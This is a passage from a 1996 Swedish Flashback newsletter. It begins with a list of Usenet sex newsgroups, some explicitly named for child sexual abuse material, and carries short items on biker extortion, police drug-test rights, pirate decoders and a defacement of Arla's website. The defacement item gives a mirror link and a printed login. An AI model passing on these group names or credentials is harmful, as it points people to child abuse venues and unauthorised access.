alt.binaries.pictures.erotica.bestiality
alt.binaries.pictures.erotica.blondes
alt.binaries.pictures.erotica.bondage
alt.binaries.pictures.erotica.cartoons
alt.binaries.pictures.erotica.female
alt.binaries.pictures.erotica.furry
alt.binaries.pictures.erotica.gaymen
alt.binaries.pictures.erotica.male
alt.binaries.pictures.erotica. orientals
alt.binaries.pictures.erotica.pregnant
alt.binaries.pictures.erotica.teen
alt.binaries.pictures.erotica.teen.d
alt.binaries.pictures.girlfriend
alt.binaries.pictures.girlfriends
alt.binaries.pictures.girl
alt.binaries.pictures.horny.nurses
alt.binaries.pictures.pictures.nudism
alt.binaries.pictures.tasteless
alt.homosexual
alt.sex.swingers
alt.sex.telephone
alt.sex.trans
alt.sex.wanted
alt.sex.watersports
alt.sex.bestiality.pictures
alt.sex.children
alt.sex.cu-seeme
alt.sex.fetish.scat
alt.sex.fetish.tinygirls
alt.sex.fetish.wet-and-messy
alt.sex.oral
alt.sex.orgy
alt.sex.pedophilia.girls
alt.sex.pedophilia.pictures
alt.sex.pictures.d
alt.sex.stories.gay
alt.sex.stories.tg
alt.sex.super-size
alt.sex.tasteless
alt.sex.teens
alt.sex.video-swap
alt.binaries.pictures.erotica.black.male
alt.binaries.pictures.erotica.children
alt.sex.sm.fig

------------------------------

* RAVERS BOJKOTTAR DENVERS MC?

Följande notis spreds i en raverelaterad mailinglista nyligen:

"Sen finns det lite mer inside information... mc klubben DENVERS (som
brukar ha goafester ibland) ligger ett par km från festplatsen, och anser
att det är deras territorium, så de kom nedstormande på Phase på Lördan och
begärde att de skulle få hela biljettkassan, eftersom arrangörerna inte
hade bett DEM om tillstånd att ha festen där... De hotade både **** och
**** som jobbar där, men de sa att de inte skulle få ett öre, särkilt inte
innan de snackat med arrangören vems pengar det var. Så Denvers-killarna
ringde till **** [arrangören] och skrämde livet ur honom, så han skänkte
dem 6000! Alla pengar de fått in, så tillslut gick de back, trots en lyckad
fest... Världen är för fan inte rättvis... Jag säger bara... Bojkotta alla
fester på Denvers!! De förtjänar inget mer stöd."

(Inskickat av: J)

------------------------------

* NÄR KAN POLISEN KRÄVA URINPROV AV DIG

För att polisen ska få ta ett urinprov krävs att personen är skäligen
misstänkt för att vara drogpåverkad. Misstanken grundas på följande:

*Personens påverkansgrad
*Personen känd som missbrukare
*Platsen är ett känt drogtillhåll
*Personen beteende, till exempel köp/säljsituation.
*Övriga tecken. Minimala pupiller tyder på heroin, stora pupiller på
amfetamin eller hasch.
*Tips om missbruk har inkommit.

Polisen har heller ingen rätt att kolla väskor om inte skälig misstankte
till brott ligger bakom. t.ex nåt olagligt sticker ut.

(Inskickat av: TeknoHead / källa: GP)

------------------------------

* ANNONSSTOPP FÖR PIRATDEKODRAR

Marknadsdomstolen förbjuder Gula Tidningen att föra in annonser från
företag som säljer olaglig avkodningsutrustning. Domen är en framgång för
betal-TV-branschen som förlorar stora pengar på grund av att piratdekodrar
florerar på marknaden.
En dekoder gör det möjligt för den som betalar, för att få tillgång till en
betal-TV-kanal, att se programmen på sin TV. För att distributörerna inte
ska gå miste om dessa inkomster är dekodrar som ej är kopplade till ett
betal-TV-abonnemang förbjudna i Sverige.
Lagen gör det kriminellt att både tillverka, sälja, hyra ut och installera
förbjuden utrustning.
Branschen anser sig föra en ojämn kamp mot tillverkare och försäljare av
den olagliga utrustningen. Särskilt som försäljningen ofta sker via
postorder från utlandet.
För att nå kunder i Sverige är de illegala försäljarna beroende av att
kunna annonsera i svenska media. Efter påtryckningar från
betal-TV-företagen har praktiskt taget landets alla tidningar slutat föra
in annonser för olaglig avkodningsutrustning. Ett undantag är Gula
Tidningen som, enligt branschen, utvecklats till ett viktigt annonsforum
för illegala dekodrar, vilket marknadsdomstolen nu sätter stopp för.
Domen förenas på begäran av branschföretagen inte med något vite. Orsaken
är att Gula Tidningen under processens gång lovat branschen bot och
bättring.

(källa: TT)

------------------------------

* ARLAS HEMSIDA FICK BESÖK AV HACKERS I SÖNDAGS

I söndags kl. 17:46 fick mjölkföretaget ARLA sin hemsida saboterade.
Förutom div. meddelanden ang. ARLA's säkerhet så lade man även in en
porrbild på hemsidan. För de som missade sidan, så finns den crackade
versionen nu även upplagd på Flashbacks Webhotel.

ARLA - crackad version:
URL: http://flashback.se/~arla/

ARLA - ocrackad version:
URL: http://www.arla.se
User: arla
Password: arla

(Inskickat av: montezuma)

------------------------------

* PS. - KOLLA IN

Adolf Hitler als Maler und Zeichner:
http://www.geocities.com/Paris/1889/
(Tavlor målade av Adolf Hitler. För konstsamlaren?)

+++

Vet du om någon intressant nyhet, eller känner till någon kul notis. Maila
den då gärna till: fna@flashback.se.

_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _

F L A S H B A C K  N E W S  A G E N C Y  ( F N A ) / F L A S H B A C K :

email: fna@flashback.se / flashback@flashback.se
www: http://www.flashback.se/
irc: #flashback (EFNet / DALnet)
ftp: ftp.flashback.se

+ + +

prenumeration på fna (flashback news agency): gratis (!!!)
prenumeration på flashback - sverige (3 nummer): 150kr (självkostnadspris).
stödprenumeration på flashback (3 nummer): 200kr.
prenumeration på flashback - norden (3 nummer): 200kr.
prenumeration på flashback - övriga världen (3 nummer): 220kr.

postgiro: 39 64 28-5. bankgiro: 5355-6866
postadress: flashback, box 676, 114 79 stockholm, sverige

+++

Avslutande din prenumeration genom meddelandet: "unsubscribe FNA".
Påbörja ny prenumeration genom meddelandet: "subscribe FNA".

© NO COPYRIGHT / NO RIGHTS RESERVED - FLASHBACK MAGAZINE / 1996

==========E==N==D=====F==I==L==E=====================================